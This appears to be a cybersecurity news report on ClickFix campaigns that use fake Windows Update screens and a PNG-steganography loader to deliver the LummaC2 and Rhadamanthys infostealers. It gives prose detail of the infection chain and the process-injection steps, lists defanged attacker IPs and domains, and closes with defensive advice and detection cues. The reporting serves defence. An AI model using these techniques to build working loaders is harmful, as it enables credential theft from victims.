A new wave of ClickFix attacks has emerged, employing highly sophisticated fake Windows Update screens and PNG image steganography to stealthily deploy infostealing malware, including LummaC2 and Rhadamanthys, onto victim systems.
The campaigns are designed to deceive users into executing a pre-staged command, transforming straightforward social engineering into a complex, multi-stage infection chain that is challenging for conventional defenses to detect.
ClickFix operates by persuading users to press Win+R, subsequently pasting and running a command that has been silently copied to their clipboard. Previously, attackers utilized lures masquerading as “Human Verification” or robot-check pages. However, recent activity observed by Huntress has shifted to a more convincing full-screen, blue Windows Update-style splash screen, complete with realistic progress messages.
Upon the completion of the fake update, users are instructed to follow the familiar pattern and execute the malicious Run-box command. This command typically initiates mshta.exe with a URL containing a hex-encoded second IP octet, setting off a staged chain that downloads obfuscated PowerShell and reflective .NET loaders. This method heavily relies on trusted “living off the land” binaries, allowing the malicious activity to blend seamlessly with legitimate Windows operations.
Malware hidden in PNG pixels
The campaign’s most distinctive feature is its utilization of a .NET steganographic loader that conceals shellcode within the pixel data of a PNG image. Rather than appending data, the loader AES-decrypts an embedded PNG resource, reads the raw bitmap bytes, and reconstructs shellcode from a specific color channel, employing a custom XOR-based routine to recover the payload in memory.
The extracted shellcode is Donut-packed and subsequently injected into a target process, such as explorer.exe, through dynamically compiled C# code that invokes standard Windows APIs like VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread. In the cases analyzed, this final stage has successfully delivered LummaC2 and, in a separate Windows Update cluster, the Rhadamanthys information stealer.
Huntress has been monitoring ClickFix Windows Update clusters since early October, noting the repeated use of the IP address 141.98.80[.]175 and rotating paths like /tick.odd, /gpsc.dat, and /one.dat for the initial mshta.exe stage. Subsequent PowerShell stages have been hosted on domains such as securitysettings[.]live and xoiiasdpsdoasdpojas[.]com, all pointing back to the same backend infrastructure.
These campaigns have continued to surface around the time of Operation Endgame 3.0, which targeted Rhadamanthys’ infrastructure in mid-November, disrupting servers and seizing domains associated with the stealer. Even after the takedown announcement, researchers have observed multiple active domains still serving the Windows Update ClickFix lure, although the Rhadamanthys payload itself seems to be unavailable.
Given that the attack relies heavily on user interaction with the Run dialog, a robust control measure is to disable the Windows Run box through Group Policy or registry settings, such as configuring the NoRun policy under the Explorer key. Security teams are also advised to utilize EDR telemetry to monitor for instances of explorer.exe spawning mshta.exe, powershell.exe, or other scripting binaries with suspicious command lines.
User awareness remains paramount; employees should be educated that neither CAPTCHA checks nor Windows Update processes will ever require them to paste commands into the Run prompt from a web page. During investigations, analysts can further validate potential ClickFix abuse by examining the RunMRU registry key, which logs recent commands executed via the Run dialog.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
